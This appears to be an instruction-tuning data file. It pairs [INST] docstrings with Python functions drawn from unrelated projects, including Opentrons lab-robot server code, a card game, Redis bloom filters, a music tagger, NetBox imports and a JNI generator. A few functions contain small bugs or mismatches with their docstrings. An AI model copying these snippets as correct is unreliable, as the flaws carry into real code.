+ self._reset_from_error()
+ self._setup()
+[INST] Function that sets log levels and format strings. Checks for the
+OT_LOG_LEVEL environment variable otherwise defaults to DEBUG.. [/INST] def log_init():
+ fallback_log_level = 'INFO'
+ ot_log_level = robot.config.log_level
+ if ot_log_level not in logging._nameToLevel:
+ log.info("OT Log Level {} not found. Defaulting to {}".format(
+ ot_log_level, fallback_log_level))
+ ot_log_level = fallback_log_level
+ level_value = logging._nameToLevel[ot_log_level]
+ serial_log_filename = environment.get_path('SERIAL_LOG_FILE')
+ api_log_filename = environment.get_path('LOG_FILE')
+ logging_config = dict(
+ version=1,
+ formatters={
+ 'basic': {
+ 'format':
+ '%(asctime)s %(name)s %(levelname)s [Line %(lineno)s] %(message)s'
+ }
+ },
+ handlers={
+ 'debug': {
+ 'class': 'logging.StreamHandler',
+ 'formatter': 'basic',
+ 'level': level_value
+ },
+ 'serial': {
+ 'class': 'logging.handlers.RotatingFileHandler',
+ 'formatter': 'basic',
+ 'filename': serial_log_filename,
+ 'maxBytes': 5000000,
+ 'level': logging.DEBUG,
+ 'backupCount': 3
+ },
+ 'api': {
+ 'class': 'logging.handlers.RotatingFileHandler',
+ 'formatter': 'basic',
+ 'filename': api_log_filename,
+ 'maxBytes': 1000000,
+ 'level': logging.DEBUG,
+ 'backupCount': 5
+ }
+ },
+ loggers={
+ '__main__': {
+ 'handlers': ['debug', 'api'],
+ 'level': logging.INFO
+ },
+ 'opentrons.server': {
+ 'handlers': ['debug', 'api'],
+ 'level': level_value
+ },
+ 'opentrons.api': {
+ 'handlers': ['debug', 'api'],
+ 'level': level_value
+ },
+ 'opentrons.instruments': {
+ 'handlers': ['debug', 'api'],
+ 'level': level_value
+ },
+ 'opentrons.robot.robot_configs': {
+ 'handlers': ['debug', 'api'],
+ 'level': level_value
+ },
+ 'opentrons.drivers.smoothie_drivers.driver_3_0': {
+ 'handlers': ['debug', 'api'],
+ 'level': level_value
+ },
+ 'opentrons.drivers.serial_communication': {
+ 'handlers': ['serial'],
+ 'level': logging.DEBUG
+ },
+ 'opentrons.system': {
+ 'handlers': ['debug', 'api'],
+ 'level': level_value
+ }
+ }
+ )
+ dictConfig(logging_config)
+[INST] Builds an application including the RPC server, and also configures HTTP
+routes for methods defined in opentrons.server.endpoints. [/INST] def init(loop=None):
+ server = Server(MainRouter(), loop=loop, middlewares=[error_middleware])
+ server.app.router.add_get(
+ '/health', endp.health)
+ server.app.router.add_get(
+ '/wifi/list', wifi.list_networks)
+ server.app.router.add_post(
+ '/wifi/configure', wifi.configure)
+ server.app.router.add_get(
+ '/wifi/status', wifi.status)
+ server.app.router.add_post(
+ '/identify', control.identify)
+ server.app.router.add_get(
+ '/modules', control.get_attached_modules)
+ server.app.router.add_get(
+ '/modules/{serial}/data', control.get_module_data)
+ server.app.router.add_post(
+ '/camera/picture', control.take_picture)
+ server.app.router.add_post(
+ '/server/update', endpoints.update_api)
+ server.app.router.add_post(
+ '/server/update/firmware', endpoints.update_firmware)
+ server.app.router.add_get(
+ '/server/update/ignore', endpoints.get_ignore_version)
+ server.app.router.add_post(
+ '/server/update/ignore', endpoints.set_ignore_version)
+ server.app.router.add_static(
+ '/logs', log_file_path, show_index=True)
+ server.app.router.add_post(
+ '/server/restart', endpoints.restart)
+ server.app.router.add_post(
+ '/calibration/deck/start', dc_endp.start)
+ server.app.router.add_post(
+ '/calibration/deck', dc_endp.dispatch)
+ server.app.router.add_get(
+ '/pipettes', control.get_attached_pipettes)
+ server.app.router.add_get(
+ '/motors/engaged', control.get_engaged_axes)
+ server.app.router.add_post(
+ '/motors/disengage', control.disengage_axes)
+ server.app.router.add_get(
+ '/robot/positions', control.position_info)
+ server.app.router.add_post(
+ '/robot/move', control.move)
+ server.app.router.add_post(
+ '/robot/home', control.home)
+ server.app.router.add_get(
+ '/robot/lights', control.get_rail_lights)
+ server.app.router.add_post(
+ '/robot/lights', control.set_rail_lights)
+ server.app.router.add_get(
+ '/settings', settings.get_advanced_settings)
+ server.app.router.add_post(
+ '/settings', settings.set_advanced_setting)
+ server.app.router.add_post(
+ '/settings/reset', settings.reset)
+ server.app.router.add_get(
+ '/settings/reset/options', settings.available_resets)
+ return server.app
+[INST] This application creates and starts the server for both the RPC routes
+handled by opentrons.server.rpc and HTTP endpoints defined here. [/INST] def main():
+ log_init()
+ arg_parser = ArgumentParser(
+ description="Opentrons application server",
+ prog="opentrons.server.main"
+ )
+ arg_parser.add_argument(
+ "-H", "--hostname",
+ help="TCP/IP hostname to serve on (default: %(default)r)",
+ default="localhost"
+ )
+ arg_parser.add_argument(
+ "-P", "--port",
+ help="TCP/IP port to serve on (default: %(default)r)",
+ type=int,
+ default="8080"
+ )
+ arg_parser.add_argument(
+ "-U", "--path",
+ help="Unix file system path to serve on. Specifying a path will cause "
+ "hostname and port arguments to be ignored.",
+ )
+ args, _ = arg_parser.parse_known_args(sys.argv[1:])
+ if args.path:
+ log.debug("Starting Opentrons server application on {}".format(
+ args.path))
+ else:
+ log.debug("Starting Opentrons server application on {}:{}".format(
+ args.hostname, args.port))
+ try:
+ robot.connect()
+ except Exception as e:
+ log.exception("Error while connecting to motor-driver: {}".format(e))
+ log.info("API server version: {}".format(__version__))
+ log.info("Smoothie FW version: {}".format(robot.fw_version))
+ if not ff.disable_home_on_boot():
+ log.info("Homing Z axes")
+ robot.home_z()
+ if not os.environ.get("ENABLE_VIRTUAL_SMOOTHIE"):
+ setup_udev_rules_file()
+ unlock_resin_updates()
+ web.run_app(init(), host=args.hostname, port=args.port, path=args.path)
+ arg_parser.exit(message="Stopped\n")
+[INST] Build a fake minor package and return its path. [/INST] def build_pkg(package_name, version, in_dir=None):
+ if not in_dir:
+ td = tempfile.mkdtemp()
+ in_dir = os.path.join(td, package_name)
+ os.mkdir(in_dir)
+ test_setup = """
+from setuptools import setup
+setup(name='{0}',
+version='{1}',
+description='Test package',
+url='http://github.com/Opentrons/opentrons',
+author='Opentrons',
+author_email='test@example.com',
+license='Apache 2.0',
+packages=['{0}'],
+zip_safe=False)
+""".format(package_name, version)
+ test_setup_file = os.path.join(in_dir, 'setup.py')
+ with open(test_setup_file, 'w') as tsf:
+ tsf.write(test_setup)
+ src_dir = os.path.join(in_dir, package_name)
+ try:
+ os.mkdir(src_dir)
+ except FileExistsError:
+ pass
+ test_code = """
+print("all ok")'
+"""
+ test_file = os.path.join(src_dir, '__init__.py')
+ with open(test_file, 'w') as tf:
+ tf.write(test_code)
+ cmd = '{} setup.py bdist_wheel'.format(sys.executable)
+ subprocess.run(cmd, cwd=in_dir, shell=True)
+ return os.path.join(
+ in_dir, 'dist',
+ '{}-{}-py3-none-any.whl'.format(package_name, version))
+[INST] Calculate axis position for a given liquid volume.
+Translates the passed liquid volume to absolute coordinates
+on the axis associated with this pipette.
+
+Calibration of the pipette motor's ul-to-mm conversion is required. [/INST] def _aspirate_plunger_position(self, ul):
+ model = self.name
+ if self.ul_per_mm:
+ ul_per_mm = lambda: self.ul_per_mm
+ else:
+ ul_per_mm = self._key_map_pipette_functions(model, ul, 'aspirate')
+ millimeters = ul / ul_per_mm()
+ destination_mm = self._get_plunger_position('bottom') + millimeters
+ return round(destination_mm, 6)
+[INST] Calculate axis position for a given liquid volume.
+Translates the passed liquid volume to absolute coordinates
+on the axis associated with this pipette.
+
+Calibration of the pipette motor's ul-to-mm conversion is required. [/INST] def _dispense_plunger_position(self, ul):
+ model = self.name
+ if self.ul_per_mm:
+ ul_per_mm = lambda: self.ul_per_mm
+ else:
+ ul_per_mm = self._key_map_pipette_functions(model, ul, 'dispense')
+ millimeters = ul / ul_per_mm()
+ destination_mm = self._get_plunger_position('bottom') + millimeters
+ return round(destination_mm, 6)
+[INST] Returns the plunger percentage for a given volume.
+We use this to calculate what actual position the plunger axis
+needs to be at in order to achieve the correct volume of liquid.. [/INST] def _volume_percentage(self, volume):
+ if volume < 0:
+ raise RuntimeError(
+ "Volume must be a positive number, got {}.".format(volume))
+ if volume > self.max_volume:
+ raise RuntimeError(
+ "{0}µl exceeds pipette's maximum volume ({1}ul).".format(
+ volume, self.max_volume))
+ if volume < self.min_volume:
+ self.robot.add_warning(
+ "{0}µl is less than pipette's min_volume ({1}ul).".format(
+ volume, self.min_volume))
+ return volume / self.max_volume
+[INST] Draw a card depending how many it will be drawn.. [/INST] def draw_card(deck, draw_number):
+ draw_copy = deck[0:draw_number]
+ del deck[0:draw_number]
+ return draw_copy
+[INST] Find the card in the player's hand.. [/INST] def find_card(hand, card):
+ try:
+ if hand.index(card):
+ return True
+ except ValueError:
+ return False
+[INST] Discard the card into play.. [/INST] def play_card(hand, card_index, discard_pile):
+ copied_card = hand[card_index]
+ if not discard_pile:
+ del hand[card_index]
+ discard_pile.append(copied_card)
+ elif card_compare(hand[card_index], discard_pile[-1]):
+ del hand[card_index]
+ discard_pile.append(copied_card)
+[INST] Do an action depending on the top of the discard pile.. [/INST] def do_action(hand, deck, discard_pile):
+ top_discard_card = discard_pile[-1]
+ if top_discard_card == "wild-draw-4":
+ print("\nThe draw 4 wildcard has been played. The game will automatically draw 4 cards for you.\n")
+ new_4_cards = ' '.join(deck[0:4])
+ hand += draw_card(deck, 4)
+ print("The new cards are:", new_4_cards + "\n")
+ elif top_discard_card.endswith("draw-2"):
+ top_discard_card_color = top_discard_card.split("-")[0]
+ print("\nThe draw 2 card from the color", top_discard_card_color, "has been played. The game will \
+automatically draw 2 cards for you.\n")
+ new_2_cards = ' '.join(deck[0:2])
+ hand += draw_card(deck, 2)
+ print("The news cards are", new_2_cards + "\n")
+[INST] Refill deck from the discard pile if it runs out.. [/INST] def refill_deck(deck, discard_pile):
+ if deck:
+ return
+ else:
+ deck += random.sample(discard_pile.copy(), len(discard_pile))
+ discard_pile.clear()
+[INST] \
+This is the main function of the program.
+
+This function will be called immediately at start of execution.. [/INST] def main():
+ my_deck = make_deck()
+ players_hands = {
+ "User": []
+ }
+ players_hands["Computer"] = []
+ players_names = list(players_hands.keys())
+ discard_pile = []
+ for player in players_hands.keys():
+ players_hands[player] = draw_card(my_deck, 7)
+ beginning = True
+ game_over = False
+ while not game_over:
+ for player in players_names:
+ refill_deck(my_deck, discard_pile)
+ curr_player_hand = players_hands[player]
+ print("It is", player + "'s", "turn\n")
+ if player == "User":
+ draw_limit = 1
+ if beginning:
+ print("Drop a card to the discard pile to start.")
+ else:
+ print("Pick the right card to drop to the discard pile.")
+ if discard_pile:
+ print("Current play:", discard_pile[-1])
+ for card in enumerate(curr_player_hand, start=1):
+ print(str(card[0]) + ":", card[1])
+ repeat_process = True
+ while repeat_process:
+ print("Number of cards in deck:", len(my_deck))
+ try:
+ selected_card = int(input("Select card (0 to draw, -1 to check hand and -2 to end turn): "))
+ except ValueError:
+ continue
+ if selected_card <= len(curr_player_hand) and selected_card >= 1:
+ if not discard_pile or card_compare(curr_player_hand[selected_card-1], discard_pile[-1]):
+ play_card(curr_player_hand, selected_card-1, discard_pile)
+ do_action(curr_player_hand, my_deck, discard_pile)
+ print(player + "'s turn has ended.\n")
+ repeat_process = False
+ else:
+ print("Wrong card, try again\n")
+ elif selected_card == 0:
+ if draw_limit > 0:
+ curr_player_hand += draw_card(my_deck, 1)
+ print("New card has been added to your hand ({})\n".format(curr_player_hand[-1]))
+ draw_limit -= 1
+ continue
+ else:
+ print("You can't draw anymore until your next turn!\n")
+ elif selected_card == -1:
+ print("It is", player + "'s turn")
+ if discard_pile:
+ print("Current play:", discard_pile[-1])
+ for card in enumerate(curr_player_hand, start=1):
+ print(str(card[0]) + ":", card[1])
+ continue
+ elif selected_card == -2:
+ print("\n" + player + "'s turn has ended\n")
+ repeat_process = False
+ else:
+ print("\nPlease pick a number that is shown at the screen.\n")
+ continue
+ else:
+ ai(player, curr_player_hand, my_deck, discard_pile)
+ if is_winner(player, curr_player_hand):
+ print(player, "has won the game!")
+ game_over = True
+ break
+[INST] Update the i-th node value to x.. [/INST] def update(self, i, x):
+ i += self.N - 1
+ self.node[i] = x
+ while i > 1:
+ i >>= 1
+ self.node[i] = self.func(self.node[i << 1], self.node[i << 1 | 1])
+[INST] Compute semi-orthogonality error (for debugging purposes).. [/INST] def orth_error(self):
+ orth_error = 0
+ for layer in [self.factor1, self.factor2]:
+ orth_error += layer.orth_error()
+ return orth_error
+[INST] Check whether the context is symmetrical and whether the passed
+context can be used for creating a convolution kernel with dil. [/INST] def check_valid_context(context: list) -> None:
+ assert len(context) == 2 or len(context) % 2 != 0, "Context length must be 2 or odd"
+ if len(context) == 2:
+ assert context[0] + context[1] == 0, "Context must be of type {-1, 1}"
+ else:
+ assert context[len(context) // 2] == 0, "The context contain 0 in the center"
+ if len(context) > 1:
+ delta = [context[i] - context[i - 1] for i in range(1, len(context))]
+ assert all(delta[0] == delta[i] for i in range(1, len(delta))), \
+ "Intra context spacing must be equal!"
+[INST] Check if all the dependencies required by this application are installed. [/INST] def check_app_dependencies(self, deps):
+ if not deps:
+ return True
+ for dep in [x.strip() for x in deps.split(',') if x != ""]:
+ try:
+ app = ONOSApp.objects.get(app_id=dep)
+ if not app.backend_code == 1:
+ return False
+ except IndexError:
+ return False
+ return True
+[INST] Never acquire a ServiceInstance on the ONOS Service,
+those are ONOS apps, simply return true. [/INST] def acquire_service_instance(self, subscriber_service_instance):
+ return True
+[INST] In the case of the ONOS service there are no links between ServiceInstances and ONOSApps,
+so alway return an empty list. [/INST] def validate_links(self, subscriber_service_instance):
+ return []
+[INST] A quick and dirty way to reset Redis for the demo.. [/INST] def reset_app():
+ r_client = RedisConn().get_client()
+ current_keys = r_client.keys("*")
+ for key in current_keys:
+ r_client.delete(key)
+ return True
+[INST] Keyword arguments:
+bf -- the bloom filter
+pw -- the password to add
+
+boolean indicating success
+
+AssertionError on None value args. [/INST] def add_password_bloom_filter(bf, pw):
+ return str(add_to_bloom_filter_format_result(bf, pw))
+[INST] Checks a list of grandma's passwords to see how many of her passwords were unique.
+Keyword Arguments:
+passwords -- a list of passwords
+percent_error -- the error rate (default to .2 or 20%). [/INST] def check_passwords(passwords=GRANDMA_PASSWORDS, error_rate=.2):
+ r_client = RedisConn().get_client()
+ grandma_bloom_filter = "gbloom"
+ grandma_set = "gset"
+ r_client.delete(grandma_bloom_filter)
+ r_client.delete(grandma_set)
+ r_client.bf().create(grandma_bloom_filter, error_rate, 50)
+ set_unique_count = 0
+ bf_unique_count = 0
+ check_results = list()
+ for password in passwords:
+ unique_to_bf = is_unique_bloom_filter(grandma_bloom_filter, password)
+ add_bloom_filter(grandma_bloom_filter, password)
+ if unique_to_bf:
+ bf_unique_count += 1
+ unique_to_set = is_unique_set(grandma_set, password)
+ add_set(grandma_set, password)
+ if unique_to_set:
+ set_unique_count += 1
+ password_results = RESULTS(password, unique_to_bf, unique_to_set, bf_unique_count, set_unique_count)
+ check_results.append(str(password_results))
+ return {
+ "unique_count_set": set_unique_count,
+ "unique_count_bf": bf_unique_count,
+ "total_count": len(passwords),
+ "check_results": check_results
+ }
+[INST] Adds items to specified set and formats return as boolean.
+Keyword arguments:
+set_name -- the set name
+item -- the item to add
+
+Boolean indicating success
+
+AssertionError on None value args. [/INST] def add_to_set_format_result(set_name, item):
+ result = add_set(set_name, item)
+ return result == ITEM_ADDED_SUCCESSFULLY_SET
+[INST] Converts Redis results to boolean representing if item was unique (aka not found).
+Keyword arguments:
+set_name -- the set
+item -- the item to check. [/INST] def is_unique_set(set_name, item):
+ result = is_in_set(set_name, item)
+ return result == ITEM_NOT_FOUND_IN_SET
+[INST] Adds items to specified bloom filter and formats return as boolean.
+Keyword arguments:
+bloom_filter -- the bloom filter
+item -- the item to add
+
+boolean indicating success
+
+AssertionError on None value args. [/INST] def add_to_bloom_filter_format_result(bloom_filter, item):
+ result = add_bloom_filter(bloom_filter, item)
+ return result == ITEM_ADDED_SUCCESSFULLY_BLOOM_FILTER
+[INST] Checks for item in specified bloom filter.
+Keyword arguments:
+bloom_filter -- the bloom filter
+item -- the item to check. [/INST] def is_in_bloom_filter(bloom_filter, item):
+ assert bloom_filter is not None
+ assert item is not None
+ r_client = RedisConn().get_client()
+ return r_client.bf().exists(bloom_filter, item)
+[INST] Converts Redis results to boolean representing if item was unique (aka not found).
+Keyword arguments:
+bloom_filter -- the bloom filter
+item -- the item to check. [/INST] def is_unique_bloom_filter(bloom_filter, item):
+ result = is_in_bloom_filter(bloom_filter, item)
+ return result == ITEM_NOT_FOUND_IN_BLOOM_FILTER
+[INST] Prompts user for API keys, adds them in an .ini file stored in the same
+location as that of the script. [/INST] def add_config():
+ genius_key = input('Enter Genius key : ')
+ bing_key = input('Enter Bing key : ')
+ CONFIG['keys']['bing_key'] = bing_key
+ CONFIG['keys']['genius_key'] = genius_key
+ with open(config_path, 'w') as configfile:
+ CONFIG.write(configfile)
+[INST] Prompts for song number from list of songs. [/INST] def prompt(youtube_list):
+ option = int(input('\nEnter song number > '))
+ try:
+ song_url = list(youtube_list.values())[option - 1]
+ song_title = list(youtube_list.keys())[option - 1]
+ except IndexError:
+ log.log_error('Invalid Input')
+ exit()
+ system('clear')
+ print('Download Song: ')
+ print(song_title)
+ print('Y/n?')
+ confirm = input('>')
+ if confirm == '' or confirm.lower() == 'y':
+ pass
+ elif confirm.lower() == 'n':
+ exit()
+ else:
+ log.log_error('Invalid Input')
+ exit()
+ return song_url, song_title
+[INST] Downloads song from youtube-dl. [/INST] def download_song(song_url, song_title):
+ outtmpl = song_title + '.%(ext)s'
+ ydl_opts = {
+ 'format': 'bestaudio/best',
+ 'outtmpl': outtmpl,
+ 'postprocessors': [{
+ 'key': 'FFmpegExtractAudio',
+ 'preferredcodec': 'mp3',
+ 'preferredquality': '192',
+ },
+ {'key': 'FFmpegMetadata'},
+ ],
+ }
+ with youtube_dl.YoutubeDL(ydl_opts) as ydl:
+ info_dict = ydl.extract_info(song_url, download=True)
+[INST] Improves file name by removing crap words. [/INST] def songname(song_name):
+ try:
+ song_name = splitext(song_name)[0]
+ except IndexError:
+ pass
+ chars_filter = "()[]{}-:_/=+\"\'"
+ words_filter = ('official', 'lyrics', 'audio', 'remixed', 'remix', 'video',
+ 'full', 'version', 'music', 'mp3', 'hd', 'hq', 'uploaded')
+ song_name = ''.join(map(lambda c: " " if c in chars_filter else c, song_name))
+ song_name = re.sub('|'.join(re.escape(key) for key in words_filter),
+ "", song_name, flags=re.IGNORECASE)
+ song_name = re.sub(' +', ' ', song_name)
+ return song_name.strip()
+[INST] Provides a score out of 10 that determines the
+relevance of the search result. [/INST] def matching_details(song_name, song_title, artist):
+ match_name = difflib.SequenceMatcher(None, song_name, song_title).ratio()
+ match_title = difflib.SequenceMatcher(None, song_name, artist + song_title).ratio()
+ if max(match_name,match_title) >= 0.55:
+ return True, max(match_name,match_title)
+ else:
+ return False, (match_name + match_title) / 2
+[INST] Adds the album art to the song. [/INST] def add_albumart(albumart, song_title):
+ try:
+ img = urlopen(albumart)
+ except Exception:
+ log.log_error("* Could not add album art", indented=True)
+ return None
+ audio = EasyMP3(song_title, ID3=ID3)
+ try:
+ audio.add_tags()
+ except _util.error:
+ pass
+ audio.tags.add(
+ APIC(
+ encoding=3,
+ mime='image/png',
+ type=3,
+ desc='Cover',
+ data=img.read()
+ )
+ )
+ audio.save()
+ log.log("> Added album art")
+[INST] Searches for '.mp3' files in directory (optionally recursive)
+and checks whether they already contain album art and album name tags or not.. [/INST] def fix_music(file_name):
+ setup()
+ if not Py3:
+ file_name = file_name.encode('utf-8')
+ tags = File(file_name)
+ log.log(file_name)
+ log.log('> Adding metadata')
+ try:
+ artist, album, song_name, lyrics, match_bool, score = get_details_spotify(
+ file_name)
+ except Exception:
+ artist, album, song_name, lyrics, match_bool, score = get_details_letssingit(
+ file_name)
+ try:
+ log.log_indented('* Trying to extract album art from Google.com')
+ albumart = albumsearch.img_search_google(artist+' '+album)
+ except Exception:
+ log.log_indented('* Trying to extract album art from Bing.com')
+ albumart = albumsearch.img_search_bing(artist+' '+album)
+ if match_bool:
+ add_albumart(albumart, file_name)
+ add_details(file_name, song_name, artist, album, lyrics)
+ try:
+ rename(file_name, artist+' - '+song_name+'.mp3')
+ except Exception:
+ log.log_error("Couldn't rename file")
+ pass
+ else:
+ log.log_error(
+ "* Couldn't find appropriate details of your song", indented=True)
+ log.log("Match score: %s/10.0" % round(score * 10, 1))
+ log.log(LOG_LINE_SEPERATOR)
+ log.log_success()
+[INST] Provision the config context based on the json file present in the config-contexts folder.
+Uses the json filename as config context name. Applies it to the roles leaf and spine.
+Limitation: Do not update the Config context if the content of the json file change.. [/INST] def provision_config_context():
+ for file in glob.glob('config-contexts/*.json'):
+ with open(file) as json_data:
+ ccdata = json.load(json_data)
+ ccname= os.path.basename(file).split(".")[0]
+ get_or_create(nb.extras.config_contexts, search='name', name=ccname, data= ccdata, roles=[role_leaf.id,role_spine.id])
+[INST] Converts dirty strings into something URL-friendly.
+FYI - Ordering is important.. [/INST] def slugify(s):
+ s = s.lower()
+ for c in [' ', '-', '.', '/']:
+ s = s.replace(c, '_')
+ s = re.sub(r'\W', '', s)
+ s = s.replace('_', ' ')
+ s = re.sub(r'\s+', ' ', s)
+ s = s.strip()
+ s = s.replace(' ', '-')
+ return s
+[INST] Uses ruamel.yaml to load YAML files.. [/INST] def load_yaml(yaml_file: str):
+ yf = Path(yaml_file)
+ if not yf.is_file():
+ return None
+ with yf.open("r") as stream:
+ yaml = YAML(typ="safe")
+ return yaml.load(stream)
+[INST] Runs multiple checks to see if the device type already exists in NetBox.. [/INST] def device_type_exists(device_type):
+ try:
+ print(f"Checking if {device_type['model']} exists")
+ _slug = slugify(device_type['model'])
+ if nb.dcim.device_types.filter(model=device_type['model']):
+ print(f"Found device_type dict {device_type['model']}")
+ return True
+ elif nb.dcim.device_types.get(model=device_type['model']):
+ print(f"Found device_type name {device_type['model']}")
+ return True
+ elif nb.dcim.device_types.get(slug=device_type['slug']):
+ print(f"Found device_type slug {device_type['slug']}")
+ return True
+ elif nb.dcim.device_types.get(slug=_slug):
+ print(f"Found device_type _slug {_slug}")
+ return True
+ else:
+ return False
+ except Exception as e:
+ raise DeviceTypeLookupError(f"Error for {device_type}: {e}")
+[INST] Validates and modifies data before inserting in NetBox.. [/INST] def validate_device_data(device_type):
+ if not isinstance(device_type, dict):
+ raise DeviceTypeValidationError(f"Validation FAILED for {device_type}: \
+ {type(device_type)} is not a dict")
+ man = device_type['manufacturer']
+ man_id = get_or_create_manufacturer(man)
+ device_type['manufacturer'] = man_id
+ return device_type
+[INST] Validates and verifies the device type before inserting in NetBox.. [/INST] def process_device_type(device_type):
+ device_type = validate_device_data(device_type)
+ does_exist = device_type_exists(device_type)
+ if does_exist is False:
+ print(f"Adding new device-type {device_type['model']}")
+ nb.dcim.device_types.create(device_type)
+ else:
+ print(f"Already a device_type: {device_type['model']}")
+ print(f"Checking for templates: {device_type['model']}")
+ process_templates(device_type)
+[INST] Process a YAML file for importing to NetBox.. [/INST] def process_yaml(yml_file):
+ device_type = load_yaml(yml_file)
+ process_device_type(device_type)
+[INST] Remove a host entry or specific options in a host entry.. [/INST] def remove(self, host, *options):
+ if len(options) == 0:
+ del self[host]
+ else:
+ entry = self.get(host)
+ entry.remove(*options)
+ if len(entry) == 0:
+ self.remove(host)
+[INST] Save the configuration somewhere safe.. [/INST] def save(self, dest):
+ if (isinstance(dest, file)):
+ dest.write(str(self))
+ elif isinstance(dest, str):
+ f = open(dest, "w")
+ f.write(str(self))
+ f.close()
+ else:
+ raise TypeError("Argument is not a file or str")
+[INST] Get the priority of this host entry. This is used for ordering in
+the eventual ssh_config.. [/INST] def priority(self):
+ return self.__priority
+[INST] Converts the SshConfigEntry to a dict.. [/INST] def to_dict(self):
+ l = {}
+ l.update(self.__options)
+ return l
+[INST] Calculate the new state of the machine after a character.
+Returns the transition object which contains a 3-tuple of:
+The new state, the output letter and the direction to move on
+the tape. [/INST] def calc(self, character):
+ return self.transitions[character]
+[INST] Updates the tape to allow experimentation with the TM. [/INST] def new_tape(self, tape):
+ self._update_tape(tape)
+ self._update_current_state(self._start_state)
+ assert self._reset_loops >= 0
+ self.MAX_LOOPS = self._reset_loops
+[INST] Internal method for updating the tape. [/INST] def _update_tape(self, tape):
+ self.tape_position = 0
+ if self.tape != None:
+ self.tape.clear()
+ assert(len(self.tape) == 0)
+ if isinstance(tape, list):
+ self.tape = [str(c) for c in tape]
+ elif type(tape) is str:
+ self.tape = [c for c in tape]
+ elif type == None:
+ self.tape = []
+ else:
+ raise ValueError("Tape has to be a list of symbols or a String (or Nothing)")
+ self.tape.append(self.EMPTY_SYMBOL)
+[INST] Internal method for updating the accept state
+Generally it is advised that this is not changed at once the
+machine has began. [/INST] def _update_accept_state(self, accept_state):
+ assert accept_state != None
+ TuringMachine._test_state(accept_state)
+ self.accept_state = accept_state
+[INST] Internal method for updating the reject state
+Generally it is advised that this is not changed at once the
+machine has began. [/INST] def _update_reject_state(self, reject_state):
+ TuringMachine._test_state(reject_state)
+ self.reject_state = reject_state
+[INST] Internal method for updating the start state.
+Can only be update ONCE upon CREATION OF THE TM.. [/INST] def _update_start_state(self, start_state):
+ assert self._start_state == None
+ TuringMachine._test_state(start_state)
+ self._start_state = start_state
+[INST] Compute the result after the next symbol. [/INST] def _read(self, symbol):
+ self.MAX_LOOPS = self.MAX_LOOPS - 1
+ t = self.current_state.calc(symbol)
+ self._move_tape(t.output_letter, t.movement_direction)
+ self._update_current_state(t.new_state)
+[INST] Checks if path is a directory.. [/INST] def is_directory(dir_path):
+ isdir = os.path.isdir(dir_path)
+ logger.debug("Path specified %s", dir_path)
+ return isdir
+[INST] Generates files required to perform JNI registration.
+Generates a srcjar containing a single class, GEN_JNI, that contains all
+native method declarations.
+
+Optionally generates a header file that provides functions
+(RegisterMainDexNatives and RegisterNonMainDexNatives) to perform
+JNI registration.. [/INST] def _Generate(java_file_paths,
+ srcjar_path,
+ proxy_opts,
+ header_path=None,
+ namespace=''):
+ results = []
+ with multiprocessing.Pool() as pool:
+ for d in pool.imap_unordered(
+ functools.partial(_DictForPath, use_proxy_hash=proxy_opts.use_hash),
+ java_file_paths):
+ if d:
+ results.append(d)
+ results.sort(key=lambda d: d['FULL_CLASS_NAME'])
+ combined_dict = {}
+ for key in MERGEABLE_KEYS:
+ combined_dict[key] = ''.join(d.get(key, '') for d in results)
+ if header_path:
+ combined_dict['HEADER_GUARD'] = \
+ os.path.splitext(header_path)[0].replace('/', '_').upper() + '_'
+ combined_dict['NAMESPACE'] = namespace
+ header_content = CreateFromDict(combined_dict, proxy_opts.use_hash)
+ with build_utils.AtomicOutput(header_path, mode='w') as f:
+ f.write(header_content)
+ with build_utils.AtomicOutput(srcjar_path) as f:
+ with zipfile.ZipFile(f, 'w') as srcjar:
+ if proxy_opts.use_hash:
+ build_utils.AddToZipHermetic(
+ srcjar,
+ '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(True),
+ data=CreateProxyJavaFromDict(combined_dict, proxy_opts))
+ build_utils.AddToZipHermetic(
+ srcjar,
+ '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(False),
+ data=CreateProxyJavaFromDict(
+ combined_dict, proxy_opts, forwarding=True))
+ else:
+ build_utils.AddToZipHermetic(
+ srcjar,
+ '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(False),
+ data=CreateProxyJavaFromDict(combined_dict, proxy_opts))
+[INST] Add the content of the forward declaration to the dictionary.. [/INST] def _AddForwardDeclaration(self):
+ template = string.Template("""\
+JNI_GENERATOR_EXPORT ${RETURN} ${STUB_NAME}(
+ JNIEnv* env,
+ ${PARAMS_IN_STUB});
+""")
+ forward_declaration = ''
+ for native in self.natives:
+ value = {
+ 'RETURN': jni_generator.JavaDataTypeToC(native.return_type),
+ 'STUB_NAME': self.helper.GetStubName(native),
+ 'PARAMS_IN_STUB': jni_generator.GetParamsInStub(native),
+ }
+ forward_declaration += template.substitute(value)
+ self._SetDictValue('FORWARD_DECLARATIONS', forward_declaration)
+[INST] Add the body of the RegisterNativesImpl method to the dictionary.. [/INST] def _AddRegisterNativesCalls(self):
+ if len(self.non_proxy_natives) == 0:
+ return ''
+ template = string.Template("""\
+ if (!${REGISTER_NAME}(env))
+ return false;
+""")
+ value = {
+ 'REGISTER_NAME':
+ jni_generator.GetRegistrationFunctionName(self.fully_qualified_class)
+ }
+ register_body = template.substitute(value)
+ if self.main_dex:
+ self._SetDictValue('REGISTER_MAIN_DEX_NATIVES', register_body)
+ else:
+ self._SetDictValue('REGISTER_NON_MAIN_DEX_NATIVES', register_body)
+[INST] Returns the implementation of the array of native methods.. [/INST] def _AddJNINativeMethodsArrays(self):
+ template = string.Template("""\
+static const JNINativeMethod kMethods_${JAVA_CLASS}[] = {
+${KMETHODS}
+};
+""")
+ open_namespace = ''
+ close_namespace = ''
+ if self.namespace:
+ parts = self.namespace.split('::')
+ all_namespaces = ['namespace %s {' % ns for ns in parts]
+ open_namespace = '\n'.join(all_namespaces) + '\n'
+ all_namespaces = ['} // namespace %s' % ns for ns in parts]
+ all_namespaces.reverse()
+ close_namespace = '\n'.join(all_namespaces) + '\n\n'
+ body = self._SubstituteNativeMethods(template)
+ self._SetDictValue('JNI_NATIVE_METHOD_ARRAY', ''.join((open_namespace, body,
+ close_namespace)))
+[INST] Returns KMethodString for wrapped native methods in all_classes. [/INST] def _AddProxyNativeMethodKStrings(self):
+ if self.main_dex:
+ key = 'PROXY_NATIVE_METHOD_ARRAY_MAIN_DEX'
+ else:
+ key = 'PROXY_NATIVE_METHOD_ARRAY'
+ proxy_k_strings = ('\n'.join(
+ self._GetKMethodArrayEntry(p) for p in self.proxy_natives))
+ self._SetDictValue(key, proxy_k_strings)
+[INST] Substitutes NAMESPACE, JAVA_CLASS and KMETHODS in the provided
